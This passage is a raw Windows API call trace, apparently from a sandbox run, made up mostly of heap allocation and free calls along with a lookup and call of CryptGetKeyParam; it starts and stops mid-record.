lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0109.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0109.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24e0 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0109.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ef0 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0109.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0109.579] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0109.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0109.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0109.579] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0109.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0109.580] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0109.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0109.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0109.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0109.581] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0109.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0109.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0109.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0109.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0109.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0109.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0109.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0109.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0109.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0109.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0109.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0109.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0109.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0109.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0109.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0109.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0109.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0109.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0109.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0109.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0109.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0109.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0109.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0109.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0109.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0109.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0109.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0109.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0109.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0109.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0109.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0109.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0109.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0109.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0109.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0109.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0109.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0109.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0109.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0109.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fc8 [0109.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0109.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0109.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0109.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0109.586] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0109.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0109.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0109.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0109.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0109.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0109.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0109.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0109.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0109.586] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2560, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2560*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0109.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0109.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0109.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0109.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0109.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0109.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0109.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, 